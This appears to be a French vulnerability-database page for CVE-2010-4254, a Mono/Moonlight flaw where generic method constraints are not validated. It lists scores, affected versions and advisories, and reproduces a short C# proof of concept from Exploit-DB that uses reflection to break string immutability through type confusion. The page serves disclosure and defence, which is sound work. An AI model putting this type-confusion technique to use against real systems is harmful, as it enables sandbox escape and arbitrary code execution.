CVE-2010-4254 : Détail

CVE-2010-4254

A03-Injection
66.09%V3
Network
2010-12-03
19h00 +00:00
2011-01-15
09h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Mono, when Moonlight before 2.3.0.1 or 2.99.x before 2.99.0.10 is used, does not properly validate arguments to generic methods, which allows remote attackers to bypass generic constraints, and possibly execute arbitrary code, via a crafted method call.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 15974

Date de publication : 2011-01-10 23h00 +00:00
Auteur : Chris Howie
EDB Vérifié : Yes

Sources: https://www.chrishowie.com/2010/11/24/mutable-strings-in-mono/ https://www.securityfocus.com/bid/45051/info Mono and Moonlight is prone to a local privilege-escalation vulnerability. Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer. PoC: using System; using System.Reflection; public class FakeString { public int length; public char start_char; } public class TestCase { private static FakeString UnsafeConversion<T>(T thing) where T : FakeString { return thing; } public static void Main() { var a = "foo"; var b = MakeMutable(a); Console.WriteLine(a); b.start_char = 'b'; Console.WriteLine(a); } private static FakeString MakeMutable(string s) { var m = typeof(TestCase).GetMethod("UnsafeConversion", BindingFlags.NonPublic | BindingFlags.Static); var m2 = m.MakeGenericMethod(typeof(string)); var d = (Func<string, FakeString>)Delegate.CreateDelegate(typeof(Func<string, FakeString>), null, m2); return d(s); } }

Products Mentioned

Configuraton 0

Mono>>Mono >> Version *

Novell>>Moonlight >> Version To (including) 2.3.0

    Novell>>Moonlight >> Version 2.99.0

      Novell>>Moonlight >> Version 2.99.1

        Novell>>Moonlight >> Version 2.99.2

          Novell>>Moonlight >> Version 2.99.7

            Novell>>Moonlight >> Version 2.99.9

              Références

              http://secunia.com/advisories/42373
              Tags : third-party-advisory, x_refsource_SECUNIA
              http://www.exploit-db.com/exploits/15974
              Tags : exploit, x_refsource_EXPLOIT-DB
              http://secunia.com/advisories/42877
              Tags : third-party-advisory, x_refsource_SECUNIA
              http://www.securityfocus.com/bid/45051
              Tags : vdb-entry, x_refsource_BID
              http://www.vupen.com/english/advisories/2011/0076
              Tags : vdb-entry, x_refsource_VUPEN